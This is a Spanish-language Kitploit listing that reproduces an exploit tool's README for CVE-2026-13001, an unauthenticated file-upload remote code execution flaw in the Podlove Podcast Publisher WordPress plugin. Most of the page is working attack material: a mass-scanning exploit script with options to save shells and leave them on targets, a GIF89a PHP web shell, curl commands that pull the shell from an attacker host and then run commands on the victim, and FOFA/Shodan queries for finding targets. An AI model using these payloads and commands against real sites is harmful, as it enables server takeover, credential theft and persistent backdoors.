Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-13001 — RCE por subida de archivos no autenticada en Podlove Podcast Publisher mediante discrepancia entre is_image() y extract_file_extension() | CVSS 9.8 | Kitploit
Herramientas/GitHubGitHub/shinthink/cve-2026-13001
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubshinthink/cve-2026-13001

CVE-2026-13001

RCE por subida de archivos no autenticada en Podlove Podcast Publisher mediante discrepancia entre is_image() y extract_file_extension() | CVSS 9.8

Ver Repositorio
2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-13001 — RCE por subida de archivos no autenticada en Podlove Podcast Publisher

Desajuste entre is_image() y extract_file_extension() → Subida de poliglotos PHP


Descripción general

CVE-2026-13001 es una vulnerabilidad de subida arbitraria de archivos no autenticada de gravedad crítica (CVSS 9.8) en las versiones ≤ 4.5.1 del plugin de WordPress Podlove Podcast Publisher.

La vulnerabilidad explota un desajuste entre dos funciones internas que analizan las extensiones de archivo de forma diferente:

  • is_image() usa basename(), que incluye cadenas de consulta → la URL shell.php?.gif aparece como .gif ✅ (imagen válida)
  • extract_file_extension() usa solo la ruta de parse_url() → devuelve .php → el archivo se guarda con extensión .php 🚨

Los atacantes suben poliglotos PHP GIF89a (cabecera GIF válida + PHP incrustado) que superan la validación de imagen pero se ejecutan como PHP al ser accedidos.

Versiones afectadas

VersiónEstado
≤ 4.5.1Vulnerable
4.5.2+Parcheada

Descubierto por: Talal Nasraddeen a través de Wordfence (14 de julio de 2026)


Mecanismo de la vulnerabilidad

Causa raíz

root@kitploit:~
// is_image() — uses basename() which includes query string
function is_image($url) {
    $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
    return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() → "shell.php?.gif" → ext = "gif" ✅ BYPASSED
root@kitploit:~
// extract_file_extension() — uses parse_url() path only
function extract_file_extension($url) {
    $path = parse_url($url, PHP_URL_PATH);
    return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() → "/shell.php" → ext = "php" 🚨 SAVED AS .php

Flujo del ataque

root@kitploit:~
1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() validates .gif extension → PASS
4. Plugin downloads file → saves as test_original.php in cache/
5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
6. PHP executes → RCE

Instalación

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt

Uso

root@kitploit:~
# Single target
python cve_2026_13001.py -t target.com

# Mass scan
python cve_2026_13001.py -f targets.txt -o shells.txt

# Custom payload URL
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif

# Debug mode, leave shells
python cve_2026_13001.py -t target.com --debug --no-cleanup

Argumentos

root@kitploit:~
  -t, --target       Single target (domain or IP)
  -f, --file         Target list, one per line
  -o, --output       Save RCE URLs to file
  --payload-url      URL hosting the PHP polyglot (default: GitHub raw)
  --threads          Concurrent workers (default: 30)
  --no-cleanup       Leave shells on target
  --debug            Show every HTTP request
  -v, --verbose      Verbose output

Prueba de concepto

Objetivo único

root@kitploit:~
$ python cve_2026_13001.py -t podcast-site.com
root@kitploit:~
  Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8

  Host       : podcast-site.com
  Podlove    : YES v4.5.1
  Upload     : YES
  RCE        : YES
  Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 4.2s

Escaneo masivo

root@kitploit:~
  Targets: 500  |  Threads: 30
  Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif

  [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
  [150/500] 30% | Det:42 RCE:8

Explotación manual

Paso 1 — Aloja un shell políglota

root@kitploit:~
// shell.php — save and host on your server
GIF89a<?php system($_GET['c']); ?>

Paso 2 — Codifica en hexadecimal la URL con el bypass

root@kitploit:~
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'

Paso 3 — Activa la descarga de la caché

root@kitploit:~
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'

Paso 4 — Accede al shell

root@kitploit:~
# Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"

Impacto

La explotación exitosa permite la ejecución remota de código como el usuario del servidor web:

  • Extraer wp-config.php → credenciales de la base de datos
  • Acceder a todo el contenido, usuarios y datos de plugins de WordPress
  • Desplegar puertas traseras persistentes
  • Moverse lateralmente hacia redes internas

Aviso legal

SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.

Los autores no asumen ninguna responsabilidad por el mal uso.


Referencias


No afiliado con Podlove.

Descargar herramienta
RecursoEnlace
Aviso de Wordfencewordfence.com
Comunicado de seguridad de Podlovepodlove.org
Entrada NVDCVE-2026-13001
PoC de Raimu0x19GitHub
InvestigadorTalal Nasraddeen